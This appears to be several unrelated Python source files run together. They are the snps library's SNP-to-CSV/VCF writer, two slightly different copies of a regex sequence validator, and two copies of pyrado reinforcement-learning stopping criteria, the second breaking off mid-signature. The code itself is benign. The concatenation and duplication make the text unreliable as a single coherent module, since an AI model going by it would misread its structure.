""" Class for writing SNPs. """ """ BSD 3-Clause License Copyright (c) 2019, Andrew Riha All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. """ import datetime import logging import numpy as np import pandas as pd import snps from snps.utils import save_df_as_csv, clean_str logger = logging.getLogger(__name__) class Writer: """Class for writing SNPs to files.""" def __init__(self, snps=None, filename="", vcf=False, atomic=True, **kwargs): """Initialize a `Writer`. Parameters ---------- snps : SNPs SNPs to save to file or write to buffer filename : str or buffer filename for file to save or buffer to write to vcf : bool flag to save file as VCF atomic : bool atomically write output to a file on local filesystem **kwargs additional parameters to `pandas.DataFrame.to_csv` """ self._snps = snps self._filename = filename self._vcf = vcf self._atomic = atomic self._kwargs = kwargs def write(self): if self._vcf: return self._write_vcf() else: return (self._write_csv(),) @classmethod def write_file(cls, snps=None, filename="", vcf=False, atomic=True, **kwargs): """Save SNPs to file. Parameters ---------- snps : SNPs SNPs to save to file or write to buffer filename : str or buffer filename for file to save or buffer to write to vcf : bool flag to save file as VCF atomic : bool atomically write output to a file on local filesystem **kwargs additional parameters to `pandas.DataFrame.to_csv` Returns ------- str path to file in output directory if SNPs were saved, else empty str discrepant_vcf_position : pd.DataFrame SNPs with discrepant positions discovered while saving VCF """ w = cls(snps=snps, filename=filename, vcf=vcf, atomic=atomic, **kwargs) return w.write() def _write_csv(self): """Write SNPs to a CSV file. 
Returns ------- str path to file in output directory if SNPs were saved, else empty str """ filename = self._filename if not filename: ext = ".txt" if "sep" in self._kwargs and self._kwargs["sep"] == ",": ext = ".csv" filename = f"{clean_str(self._snps.source)}_{self._snps.assembly}{ext}" comment = ( f"# Source(s): {self._snps.source}\n" f"# Build: {self._snps.build}\n" f"# Build Detected: { self._snps.build_detected}\n" f"# Phased: {self._snps.phased}\n" f"# SNPs: {self._snps.count}\n" f"# Chromosomes: {self._snps.chromosomes_summary}\n" ) if "header" in self._kwargs: if isinstance(self._kwargs["header"], bool): if self._kwargs["header"]: self._kwargs["header"] = ["chromosome", "position", "genotype"] else: self._kwargs["header"] = ["chromosome", "position", "genotype"] return save_df_as_csv( self._snps._snps, self._snps._output_dir, filename, comment=comment, atomic=self._atomic, **self._kwargs, ) def _write_vcf(self): """Write SNPs to a VCF file. References ---------- 1. The Variant Call Format (VCF) Version 4.2 Specification, 8 Mar 2019, https://samtools.github.io/hts-specs/VCFv4.2.pdf Returns ------- str path to file in output directory if SNPs were saved, else empty str discrepant_vcf_position : pd.DataFrame SNPs with discrepant positions discovered while saving VCF """ filename = self._filename if not filename: filename = f"{clean_str(self._snps.source)}_{self._snps.assembly}{'.vcf'}" comment = ( f"##fileformat=VCFv4.2\n" f'##fileDate={datetime.datetime.utcnow().strftime("%Y%m%d")}\n' f'##source="{self._snps.source}; snps v{snps.__version__}; https://pypi.org/project/snps/"\n' ) reference_sequence_chroms = ( "1", "2", "3", "4", "5", "6", "7", "8", "9", "10", "11", "12", "13", "14", "15", "16", "17", "18", "19", "20", "21", "22", "X", "Y", "MT", ) df = self._snps.snps p = self._snps._parallelizer tasks = [] # skip insertions and deletions df = df.drop( df.loc[ df["genotype"].notnull() & ( (df["genotype"].str[0] == "I") | (df["genotype"].str[0] == "D") | (df["genotype"].str[1] == "I") | (df["genotype"].str[1] == "D") ) ].index ) chroms_to_drop = [] for chrom in df["chrom"].unique(): if chrom not in reference_sequence_chroms: chroms_to_drop.append(chrom) continue tasks.append( { "resources": self._snps._resources, "assembly": self._snps.assembly, "chrom": chrom, "snps": pd.DataFrame(df.loc[(df["chrom"] == chrom)]), } ) # drop chromosomes without reference sequence data (e.g., unassigned PAR) for chrom in chroms_to_drop: df = df.drop(df.loc[df["chrom"] == chrom].index) # create the VCF representation for SNPs results = p(self._create_vcf_representation, tasks) contigs = [] vcf = [pd.DataFrame()] discrepant_vcf_position = [pd.DataFrame()] for result in list(results): contigs.append(result["contig"]) vcf.append(result["vcf"]) discrepant_vcf_position.append(result["discrepant_vcf_position"]) vcf = pd.concat(vcf) discrepant_vcf_position = pd.concat(discrepant_vcf_position) comment += "".join(contigs) comment += '##FORMAT=<ID=GT,Number=1,Type=String,Description="Genotype">\n' comment += "#CHROM\tPOS\tID\tREF\tALT\tQUAL\tFILTER\tINFO\tFORMAT\tSAMPLE\n" return ( save_df_as_csv( vcf, self._snps._output_dir, filename, comment=comment, prepend_info=False, header=False, index=False, na_rep=".", sep="\t", ), discrepant_vcf_position, ) def _create_vcf_representation(self, task): resources = task["resources"] assembly = task["assembly"] chrom = task["chrom"] snps = task["snps"] if len(snps.loc[snps["genotype"].notnull()]) == 0: return { "contig": "", "vcf": pd.DataFrame(), "discrepant_vcf_position": 
pd.DataFrame(), } seqs = resources.get_reference_sequences(assembly, [chrom]) seq = seqs[chrom] contig = f'##contig=<ID={seq.ID},URL={seq.url},length={seq.length},assembly={seq.build},md5={seq.md5},species="{seq.species}">\n' snps = snps.reset_index() df = pd.DataFrame( columns=[ "CHROM", "POS", "ID", "REF", "ALT", "QUAL", "FILTER", "INFO", "FORMAT", "SAMPLE", ] ) df = df.astype( { "CHROM": object, "POS": np.uint32, "ID": object, "REF": object, "ALT": object, "QUAL": np.float32, "FILTER": object, "INFO": object, "FORMAT": object, "SAMPLE": object, } ) df["CHROM"] = snps["chrom"] df["POS"] = snps["pos"] df["ID"] = snps["rsid"] # drop SNPs with discrepant positions (outside reference sequence) discrepant_vcf_position = snps.loc[ (snps.pos - seq.start < 0) | (snps.pos - seq.start > seq.length - 1) ] df.drop(discrepant_vcf_position.index, inplace=True) # https://stackoverflow.com/a/24838429 df["REF"] = list(map(chr, seq.sequence[df.POS - seq.start])) df["FORMAT"] = "GT" seq.clear() df["genotype"] = snps["genotype"] temp = df.loc[df["genotype"].notnull()] # https://stackoverflow.com/a/19976286 df.loc[df["genotype"].notnull(), "ALT"] = np.vectorize(self._compute_alt)( temp["REF"], temp["genotype"] ) temp = df.loc[df["genotype"].notnull()] df.loc[df["genotype"].notnull(), "SAMPLE"] = np.vectorize( self._compute_genotype )(temp["REF"], temp["ALT"], temp["genotype"]) df.loc[df["SAMPLE"].isnull(), "SAMPLE"] = "./." del df["genotype"] return { "contig": contig, "vcf": df, "discrepant_vcf_position": discrepant_vcf_position, } def _compute_alt(self, ref, genotype): genotype_alleles = list(set(genotype)) if ref in genotype_alleles: if len(genotype_alleles) == 1: return "N" else: genotype_alleles.remove(ref) return genotype_alleles.pop(0) else: genotype_alleles.sort() return ",".join(genotype_alleles) def _compute_genotype(self, ref, alt, genotype): alleles = [ref] if self._snps.phased: separator = "|" else: separator = "/" if pd.notna(alt): alleles.extend(alt.split(",")) if len(genotype) == 2: return ( f"{alleles.index(genotype[0])}{separator}{alleles.index(genotype[1])}" ) else: return f"{alleles.index(genotype[0])}"
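# A standalone sketch (illustration only, not part of the snps API) of the
# ALT/GT mapping performed by `_compute_alt` and `_compute_genotype` above:
# the REF allele gets index 0, the remaining alleles are sorted into ALT,
# and the genotype is encoded as indices into [REF] + ALT.

def vcf_alt_and_gt(ref, genotype, phased=False):
    """Return (ALT, GT) strings for a single biallelic genotype call."""
    alt_alleles = sorted(set(genotype) - {ref})
    alt = ",".join(alt_alleles) if alt_alleles else "N"  # homozygous REF -> placeholder ALT
    alleles = [ref] + alt_alleles
    sep = "|" if phased else "/"
    gt = sep.join(str(alleles.index(a)) for a in genotype)
    return alt, gt

assert vcf_alt_and_gt("A", "AG") == ("G", "0/1")    # heterozygous
assert vcf_alt_and_gt("A", "GG") == ("G", "1/1")    # homozygous non-REF
assert vcf_alt_and_gt("A", "CG") == ("C,G", "1/2")  # neither allele matches REF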
import re
from typing import Union, List, Callable, Match, Optional

__all__ = ["create_validator"]


def create_validator(
    valid_characters: Union[str, List[str]], case_sensitive: bool = True
) -> Callable[[str], Optional[Match[str]]]:
    """Function that generates a callable, regular-expression based sequence validator.

    When called on a given string, the validator will return a Match object if every
    character is one of the valid_characters, else None.

    Parameters
    ----------
    valid_characters : Union[str, List[str]]
        A string or list of single-character strings defining the set of valid characters.
    case_sensitive : bool
        False if both upper- and lower-case characters in valid_characters are valid.
        Default True.

    Returns
    -------
    Callable[[str], Optional[Match[str]]]
        Callable validator that uses re.fullmatch.

    Raises
    ------
    ValueError
        If valid_characters is a list containing multiple characters per entry.
    """
    if isinstance(valid_characters, list):
        if not all(len(c) == 1 for c in valid_characters):
            raise ValueError("expected a list of single characters")
    if case_sensitive:
        charset = set(valid_characters)
    else:
        charset = set(c.upper() for c in valid_characters)
        charset.update(c.lower() for c in valid_characters)
    pattern_string = f"[{"".join(charset)}]+"
    return re.compile(pattern_string).fullmatch
import re
from typing import Union, List, Callable, Match, Optional

__all__ = ["create_validator"]


def create_validator(
    valid_characters: Union[str, List[str]], case_sensitive: bool = True
) -> Callable[[str], Optional[Match[str]]]:
    """Function that generates a callable, regular-expression based sequence validator.

    When called on a given string, the validator will return a Match object if every
    character is one of the valid_characters, else None.

    Parameters
    ----------
    valid_characters : Union[str, List[str]]
        A string or list of single-character strings defining the set of valid characters.
    case_sensitive : bool
        False if both upper- and lower-case characters in valid_characters are valid.
        Default True.

    Returns
    -------
    Callable[[str], Optional[Match[str]]]
        Callable validator that uses re.fullmatch.

    Raises
    ------
    ValueError
        If valid_characters is a list containing multiple characters per entry.
    """
    if isinstance(valid_characters, list):
        if not all(len(c) == 1 for c in valid_characters):
            raise ValueError("expected a list of single characters")
    if case_sensitive:
        charset = set(valid_characters)
    else:
        charset = set(c.upper() for c in valid_characters)
        charset.update(c.lower() for c in valid_characters)
    pattern_string = f"[{''.join(charset)}]+"
    return re.compile(pattern_string).fullmatch
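# A short usage sketch of `create_validator` above (nothing beyond the
# function itself is assumed): build a case-insensitive DNA validator.
# Note that the characters are placed into a regex character class without
# re.escape(), so characters such as ']' or '-' would need special care.

is_dna = create_validator("ACGT", case_sensitive=False)

assert is_dna("gattaca")            # returns a Match object (truthy)
assert is_dna("GATTACA")
assert is_dna("GATTACA-") is None   # '-' is not a valid character
assert is_dna("") is None           # the '+' requires at least one character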
# Copyright (c) 2020, Fabio Muratore, Honda Research Institute Europe GmbH, and
# Technical University of Darmstadt.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
#    notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
#    notice, this list of conditions and the following disclaimer in the
#    documentation and/or other materials provided with the distribution.
# 3. Neither the name of Fabio Muratore, Honda Research Institute Europe GmbH,
#    or Technical University of Darmstadt, nor the names of its contributors may
#    be used to endorse or promote products derived from this software without
#    specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL FABIO MURATORE, HONDA RESEARCH INSTITUTE EUROPE GMBH,
# OR TECHNICAL UNIVERSITY OF DARMSTADT BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER
# IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.

from abc import abstractmethod
from enum import Enum
from typing import List, NoReturn, Optional

import numpy as np
import scipy as sp
import scipy.stats

import pyrado
from pyrado.algorithms.stopping_criteria.stopping_criterion import StoppingCriterion
from pyrado.algorithms.utils import RolloutSavingWrapper
from pyrado.sampling.sampler import SamplerBase


class ReturnStatistic(Enum):
    """All the different return statistics supported by `ReturnStatisticBasedStoppingCriterion`."""

    min = 0
    max = 1
    median = 2
    mean = 3
    variance = 4


class RolloutBasedStoppingCriterion(StoppingCriterion):
    """
    Abstract extension of the base `StoppingCriterion` class for criteria that are based on having access to rollouts.

    .. note::
        Requires the algorithm to expose a `RolloutSavingWrapper` via a property `sampler`.
    """

    def is_met(self, algo) -> bool:
        """
        Gets the sampler from the algorithm, checks if it is a `RolloutSavingWrapper`, and forwards the check of the
        stopping criterion to `_is_met_with_sampler(..)`.

        :param algo: instance of `Algorithm` that has to be evaluated
        :return: `True` if the criterion is met, and `False` otherwise
        """
        if not hasattr(algo, "sampler"):
            raise pyrado.ValueErr(
                msg="Any rollout-based stopping criterion requires the algorithm to expose a property 'sampler'!"
            )
        sampler: Optional[SamplerBase] = algo.sampler
        if not isinstance(sampler, RolloutSavingWrapper):
            raise pyrado.TypeErr(
                msg="Any rollout-based stopping criterion requires the algorithm to expose a sampler of type "
                "'RolloutSavingWrapper' via the property 'sampler'!"
            )
        return self._is_met_with_sampler(algo, sampler)

    @abstractmethod
    def _is_met_with_sampler(self, algo, sampler: RolloutSavingWrapper) -> bool:
        """
        Checks whether the stopping criterion is met.

        .. note::
            Has to be overwritten by sub-classes.
:param algo: instance of `Algorithm` that has to be evaluated :param sampler: instance of `RolloutSavingWrapper`, the sampler of `algo`, that has to be evaluated :return: `True` if the criterion is met, and `False` otherwise """ raise NotImplementedError() class ReturnStatisticBasedStoppingCriterion(RolloutBasedStoppingCriterion): """ Abstract extension of the base `RolloutBasedStoppingCriterion` class for criteria that are based on a specific statistic of the returns of rollouts of the last iteration. """ def __init__(self, return_statistic: ReturnStatistic = ReturnStatistic.median, num_lookbacks: int = 1): """ Constructor. :param return_statistic: statistic to compute; defaults to median :param num_lookbacks: over how many iterations the statistic should be computed; for example, a value of two means that the rollouts of both the current and the previous iteration will be used for computing the statistic; defaults to one """ super().__init__() self._return_statistic = return_statistic self._num_lookbacks = num_lookbacks def _is_met_with_sampler(self, algo, sampler: RolloutSavingWrapper) -> bool: """ Computes the return statistic if enough iterations have passed and forwards the computed statistic to the method `_is_met_with_return_statistic`. :param algo: instance of `Algorithm` that has to be evaluated :param sampler: instance of `RolloutSavingWrapper`, the sampler of `algo`, that has to be evaluated :return: `True` if the criterion is met, and `False` otherwise """ if len(sampler.rollouts) < self._num_lookbacks: return False step_sequences = sampler.rollouts[-self._num_lookbacks :] returns = [rollout.undiscounted_return() for step_sequence in step_sequences for rollout in step_sequence] return_statistic = self._compute_return_statistic(np.asarray(returns)) return self._is_met_with_return_statistic(algo, sampler, return_statistic) @abstractmethod def _is_met_with_return_statistic(self, algo, sampler: RolloutSavingWrapper, return_statistic: float) -> bool: """ Checks whether the stopping criterion is met. .. note:: Has to be overwritten by sub-classes. :param algo: instance of `Algorithm` that has to be evaluated :param sampler: instance of `RolloutSavingWrapper`, the sampler of `algo`, that has to be evaluated :param return_statistic: statistic that has been computed for the latest rollouts :return: `True` if the criterion is met, and `False` otherwise """ raise NotImplementedError() def _compute_return_statistic(self, returns: np.ndarray) -> float: """ Computes the desired statistic of the given list of returns according to the statistic requested in the constructor. :param returns: returns :return: statistic """ if self._return_statistic is ReturnStatistic.min: return np.min(returns) if self._return_statistic is ReturnStatistic.max: return np.max(returns) if self._return_statistic is ReturnStatistic.median: return np.quantile(returns, q=0.50) if self._return_statistic is ReturnStatistic.mean: return np.mean(returns).item() if self._return_statistic is ReturnStatistic.variance: return returns.var().item() raise pyrado.ValueErr(msg=f"Unexpected return statistic {self._return_statistic}!") class MinReturnStoppingCriterion(ReturnStatisticBasedStoppingCriterion): """ Uses any statistic (defaulting to min) of the return of the latest rollout as a stopping criterion and stops if this statistic exceeds a certain threshold. """ def __init__(self, return_threshold: float, return_statistic: ReturnStatistic = ReturnStatistic.min): """ Constructor. 
        :param return_threshold: return threshold; if the return statistic reaches this threshold, the stopping
            criterion is met
        :param return_statistic: statistic to compute; defaults to minimum
        """
        super().__init__(return_statistic=return_statistic)
        self._return_threshold = return_threshold

    def __repr__(self) -> str:
        return f"MinReturnStoppingCriterion[return_statistic={self._return_statistic}, min_return={self._return_threshold}]"

    def __str__(self) -> str:
        return f"({self._return_statistic} return >= {self._return_threshold})"

    def _is_met_with_return_statistic(self, algo, sampler: RolloutSavingWrapper, return_statistic: float) -> bool:
        """Returns whether the return statistic is greater than or equal to the return threshold."""
        return return_statistic >= self._return_threshold


class ConvergenceStoppingCriterion(ReturnStatisticBasedStoppingCriterion):
    """
    Checks for convergence of the returns for a given statistic that can be specified in the constructor. This is
    done by fitting a linear regression model to all the previous statistics (stored in a list) and performing a
    Wald test with a t-distribution of the test statistic (with the null hypothesis that the slope is zero). The
    resulting p-value is called the *probability of convergence* and is used for checking if the algorithm has
    converged. This procedure can intuitively be explained as measuring "how flat the returns are" in the presence
    of noise. It has the advantage over just checking how much the return changes that it is independent of the
    noise on the returns, i.e. no specific threshold has to be hand-tuned.

    This criterion has two modes: moving and cumulative. In the moving mode, only the latest `M` values are used for
    fitting the linear model, and in the first `M - 1` iterations the criterion is treated as not being met. In the
    cumulative mode, all the previous values are used, and only the first iteration is treated as not being met, as
    there have to be at least two points to fit a linear model. While the former is primarily useful for convergence
    checking for a regular algorithm, the latter is primarily useful for checking convergence of the subroutine in a
    meta-algorithm, as there convergence can kick in right at the beginning of the learning process because the
    environment did not change much (see for example SPRL).

    It might be helpful to use this stopping criterion in conjunction with an iterations criterion
    (`IterCountStoppingCriterion`) to ensure that the algorithm does not terminate prematurely due to initialization
    issues. For example, PPO usually takes some iterations to make progress, which leads to a flat learning curve
    that does not, however, correspond to the algorithm having converged.
    """

    def __init__(
        self,
        convergence_probability_threshold: float = 0.99,
        num_iter: Optional[int] = None,
        return_statistic: ReturnStatistic = ReturnStatistic.median,
        num_lookbacks: int = 1,
    ):
        """
        Constructor.

        :param convergence_probability_threshold: threshold of the p-value above which the algorithm is considered
            to be converged; defaults to `0.99`, i.e. a `99%` certainty that the data can be explained
        :param num_iter: number of iterations to use for the moving mode; if `None`, the cumulative mode is used
        :param return_statistic: statistic to compute; defaults to median
        :param num_lookbacks: over how many iterations the statistic should be computed; for example, a value of two
            means that the rollouts of both the current and the previous iteration will be used for computing the
            statistic; defaults to one
        """
        super().__init__(return_statistic, num_lookbacks)
        if not (num_iter is None or num_iter > 0):
            raise pyrado.ValueErr(msg="num_iter must be either None or a positive number.")
        self._convergence_probability_threshold = convergence_probability_threshold
        self._num_iter = num_iter
        self._return_statistic_history = []

    def __repr__(self) -> str:
        return (
            f"ConvergenceStoppingCriterion["
            f"convergence_probability_threshold={self._convergence_probability_threshold}, "
            f"num_iter={self._num_iter}, "
            f"return_statistic={self._return_statistic}, "
            f"num_lookbacks={self._num_lookbacks}, "
            f"return_statistic_history={self._return_statistic_history}]"
        )

    def __str__(self) -> str:
        return (
            f"({self._return_statistic} return converged, {"cumulative" if self._num_iter is None else "moving"} mode)"
        )

    def _reset(self) -> NoReturn:
        self._return_statistic_history = []

    def _is_met_with_return_statistic(self, algo, sampler: RolloutSavingWrapper, return_statistic: float) -> bool:
        """Returns whether the convergence probability is greater than or equal to the threshold."""
        self._return_statistic_history.append(return_statistic)
        convergence_prob = self._compute_convergence_probability()
        if convergence_prob is None:
            return False
        return convergence_prob >= self._convergence_probability_threshold

    def _compute_convergence_probability(self) -> Optional[float]:
        """
        Computes the convergence probability for the current data. By invoking
        `_get_relevant_return_statistic_subset`, the two modes (moving and cumulative) are implemented. If not
        enough data is present, this method does not return the probability, but `None`.

        .. note::
            This invokes the method `linregress` of `scipy.stats` and returns the corresponding p-value.

        .. seealso::
            https://docs.scipy.org/doc/scipy/reference/generated/scipy.stats.linregress.html

        :return: the convergence probability, or `None` if not enough data is present
        """
        statistic_subset = self._get_relevant_return_statistic_subset()
        if statistic_subset is None:
            return None
        return sp.stats.linregress(range(len(statistic_subset)), statistic_subset).pvalue

    def _get_relevant_return_statistic_subset(self) -> Optional[List[float]]:
        """
        Extracts the relevant subset of the return statistic history, implementing the two modes described in the
        class documentation: moving and cumulative. If the return history is empty or does not yet contain `M`
        elements, `None` is returned. The convergence checking method shall treat this as the convergence criterion
        not being met, as there is not enough data.

        :return: the relevant subset
        """
        if len(self._return_statistic_history) <= 0:
            return None
        if self._num_iter is None:
            return self._return_statistic_history
        if len(self._return_statistic_history) < self._num_iter:
            return None
        return self._return_statistic_history[-self._num_iter :]
# Copyright (c) 2020, Fabio Muratore, Honda Research Institute Europe GmbH, and
# Technical University of Darmstadt.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
#    notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
#    notice, this list of conditions and the following disclaimer in the
#    documentation and/or other materials provided with the distribution.
# 3. Neither the name of Fabio Muratore, Honda Research Institute Europe GmbH,
#    or Technical University of Darmstadt, nor the names of its contributors may
#    be used to endorse or promote products derived from this software without
#    specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL FABIO MURATORE, HONDA RESEARCH INSTITUTE EUROPE GMBH,
# OR TECHNICAL UNIVERSITY OF DARMSTADT BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER
# IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.

from abc import abstractmethod
from enum import Enum
from typing import List, NoReturn, Optional

import numpy as np
import scipy as sp
import scipy.stats

import pyrado
from pyrado.algorithms.stopping_criteria.stopping_criterion import StoppingCriterion
from pyrado.algorithms.utils import RolloutSavingWrapper
from pyrado.sampling.sampler import SamplerBase


class ReturnStatistic(Enum):
    """All the different return statistics supported by `ReturnStatisticBasedStoppingCriterion`."""

    min = 0
    max = 1
    median = 2
    mean = 3
    variance = 4


class RolloutBasedStoppingCriterion(StoppingCriterion):
    """
    Abstract extension of the base `StoppingCriterion` class for criteria that are based on having access to rollouts.

    .. note::
        Requires the algorithm to expose a `RolloutSavingWrapper` via a property `sampler`.
    """

    def is_met(self, algo) -> bool:
        """
        Gets the sampler from the algorithm, checks if it is a `RolloutSavingWrapper`, and forwards the check of the
        stopping criterion to `_is_met_with_sampler(..)`.

        :param algo: instance of `Algorithm` that has to be evaluated
        :return: `True` if the criterion is met, and `False` otherwise
        """
        if not hasattr(algo, "sampler"):
            raise pyrado.ValueErr(
                msg="Any rollout-based stopping criterion requires the algorithm to expose a property 'sampler'!"
            )
        sampler: Optional[SamplerBase] = algo.sampler
        if not isinstance(sampler, RolloutSavingWrapper):
            raise pyrado.TypeErr(
                msg="Any rollout-based stopping criterion requires the algorithm to expose a sampler of type "
                "'RolloutSavingWrapper' via the property 'sampler'!"
            )
        return self._is_met_with_sampler(algo, sampler)

    @abstractmethod
    def _is_met_with_sampler(self, algo, sampler: RolloutSavingWrapper) -> bool:
        """
        Checks whether the stopping criterion is met.

        .. note::
            Has to be overwritten by sub-classes.
:param algo: instance of `Algorithm` that has to be evaluated :param sampler: instance of `RolloutSavingWrapper`, the sampler of `algo`, that has to be evaluated :return: `True` if the criterion is met, and `False` otherwise """ raise NotImplementedError() class ReturnStatisticBasedStoppingCriterion(RolloutBasedStoppingCriterion): """ Abstract extension of the base `RolloutBasedStoppingCriterion` class for criteria that are based on a specific statistic of the returns of rollouts of the last iteration. """ def __init__(self, return_statistic: ReturnStatistic = ReturnStatistic.median, num_lookbacks: int = 1): """ Constructor. :param return_statistic: statistic to compute; defaults to median :param num_lookbacks: over how many iterations the statistic should be computed; for example, a value of two means that the rollouts of both the current and the previous iteration will be used for computing the statistic; defaults to one """ super().__init__() self._return_statistic = return_statistic self._num_lookbacks = num_lookbacks def _is_met_with_sampler(self, algo, sampler: RolloutSavingWrapper) -> bool: """ Computes the return statistic if enough iterations have passed and forwards the computed statistic to the method `_is_met_with_return_statistic`. :param algo: instance of `Algorithm` that has to be evaluated :param sampler: instance of `RolloutSavingWrapper`, the sampler of `algo`, that has to be evaluated :return: `True` if the criterion is met, and `False` otherwise """ if len(sampler.rollouts) < self._num_lookbacks: return False step_sequences = sampler.rollouts[-self._num_lookbacks :] returns = [rollout.undiscounted_return() for step_sequence in step_sequences for rollout in step_sequence] return_statistic = self._compute_return_statistic(np.asarray(returns)) return self._is_met_with_return_statistic(algo, sampler, return_statistic) @abstractmethod def _is_met_with_return_statistic(self, algo, sampler: RolloutSavingWrapper, return_statistic: float) -> bool: """ Checks whether the stopping criterion is met. .. note:: Has to be overwritten by sub-classes. :param algo: instance of `Algorithm` that has to be evaluated :param sampler: instance of `RolloutSavingWrapper`, the sampler of `algo`, that has to be evaluated :param return_statistic: statistic that has been computed for the latest rollouts :return: `True` if the criterion is met, and `False` otherwise """ raise NotImplementedError() def _compute_return_statistic(self, returns: np.ndarray) -> float: """ Computes the desired statistic of the given list of returns according to the statistic requested in the constructor. :param returns: returns :return: statistic """ if self._return_statistic is ReturnStatistic.min: return np.min(returns) if self._return_statistic is ReturnStatistic.max: return np.max(returns) if self._return_statistic is ReturnStatistic.median: return np.quantile(returns, q=0.50) if self._return_statistic is ReturnStatistic.mean: return np.mean(returns).item() if self._return_statistic is ReturnStatistic.variance: return returns.var().item() raise pyrado.ValueErr(msg=f"Unexpected return statistic {self._return_statistic}!") class MinReturnStoppingCriterion(ReturnStatisticBasedStoppingCriterion): """ Uses any statistic (defaulting to min) of the return of the latest rollout as a stopping criterion and stops if this statistic exceeds a certain threshold. """ def __init__(self, return_threshold: float, return_statistic: ReturnStatistic = ReturnStatistic.min): """ Constructor. 
        :param return_threshold: return threshold; if the return statistic reaches this threshold, the stopping
            criterion is met
        :param return_statistic: statistic to compute; defaults to minimum
        """
        super().__init__(return_statistic=return_statistic)
        self._return_threshold = return_threshold

    def __repr__(self) -> str:
        return f"MinReturnStoppingCriterion[return_statistic={self._return_statistic}, min_return={self._return_threshold}]"

    def __str__(self) -> str:
        return f"({self._return_statistic} return >= {self._return_threshold})"

    def _is_met_with_return_statistic(self, algo, sampler: RolloutSavingWrapper, return_statistic: float) -> bool:
        """Returns whether the return statistic is greater than or equal to the return threshold."""
        return return_statistic >= self._return_threshold


class ConvergenceStoppingCriterion(ReturnStatisticBasedStoppingCriterion):
    """
    Checks for convergence of the returns for a given statistic that can be specified in the constructor. This is
    done by fitting a linear regression model to all the previous statistics (stored in a list) and performing a
    Wald test with a t-distribution of the test statistic (with the null hypothesis that the slope is zero). The
    resulting p-value is called the *probability of convergence* and is used for checking if the algorithm has
    converged. This procedure can intuitively be explained as measuring "how flat the returns are" in the presence
    of noise. It has the advantage over just checking how much the return changes that it is independent of the
    noise on the returns, i.e. no specific threshold has to be hand-tuned.

    This criterion has two modes: moving and cumulative. In the moving mode, only the latest `M` values are used for
    fitting the linear model, and in the first `M - 1` iterations the criterion is treated as not being met. In the
    cumulative mode, all the previous values are used, and only the first iteration is treated as not being met, as
    there have to be at least two points to fit a linear model. While the former is primarily useful for convergence
    checking for a regular algorithm, the latter is primarily useful for checking convergence of the subroutine in a
    meta-algorithm, as there convergence can kick in right at the beginning of the learning process because the
    environment did not change much (see for example SPRL).

    It might be helpful to use this stopping criterion in conjunction with an iterations criterion
    (`IterCountStoppingCriterion`) to ensure that the algorithm does not terminate prematurely due to initialization
    issues. For example, PPO usually takes some iterations to make progress, which leads to a flat learning curve
    that does not, however, correspond to the algorithm having converged.
    """

    def __init__(
        self,
        convergence_probability_threshold: float = 0.99,
        num_iter: Optional[int] = None,
